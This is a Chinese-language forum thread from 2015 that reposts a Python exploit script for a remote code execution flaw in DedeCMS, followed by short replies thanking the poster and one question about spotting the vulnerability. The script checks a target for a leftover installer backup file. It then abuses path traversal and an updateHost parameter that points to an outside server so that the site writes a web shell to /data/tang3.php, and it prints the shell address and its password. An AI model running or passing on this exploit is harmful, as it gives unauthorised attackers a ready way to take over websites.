dedecms远程代码执行利用脚本

90_ · 发表于 2015-7-23 11:39:12

转自90sec@Joseph

[Python] 纯文本查看 复制代码

#! /usr/bin/env python
#coding=utf-8
#Joseph(小续)
 
import requests
import sys
import re
def main():
    try:
        url="http://"+sys.argv[1].strip('http://')
    except IndexError:
        print '''
        poc: dede.py [url]http://www.baidu.com/[/url]
        '''
    payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"
    urlpoc=url+payload
    code=requests.get(urlpoc).status_code
    if code==200:
        print u"恭喜存在此漏洞"
        print u"Ongoing attacks--->>>>>"
        exploit(url)
        pass
    else:
        print u"sorry 漏洞正在挣扎"
        pass
def exploit(url):
    urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=http://www.mrjking.com/"
    htmlcontent=requests.get(urlpoc).content
    Probe=re.compile(r'存在')
    if Probe.findall(htmlcontent):
        print u'''
        ver:getshell成功
        shell:url+/data/tang3.php?a=0  密码为：c
        '''
        pass
    else:
        print u"请看远程地址是否已经不可用"
        pass
if __name__ == '__main__':
    main()

ayang · 发表于 2015-7-23 14:29:10

学习学习技术，加油！

ljy07 · 发表于 2015-7-25 17:01:24

qjf541502724 · 发表于 2015-7-26 00:42:31

90 大大如果直接就下载了index.php.bak这个文件是不是代表漏洞不存在啊

54hacker · 发表于 2015-7-26 08:09:42

支持中国红客联盟(ihonker.org)

Andre · 发表于 2015-7-26 12:20:11

感谢分享，收藏！

Sty，涛 · 发表于 2015-7-26 15:35:27

404网安 · 发表于 2015-7-26 16:56:55

qjf541502724 发表于 2015-7-26 00:42
90 大大如果直接就下载了index.php.bak这个文件是不是代表漏洞不存在啊

对的

菜鸟小羽 · 发表于 2015-7-26 17:38:38

感谢楼主的分享~

ruguoruo · 发表于 2015-7-26 21:45:15

还是不错的哦，顶了

dedecms远程代码执行利用脚本

相关帖子

点评

指导单位

旗下站点

联系我们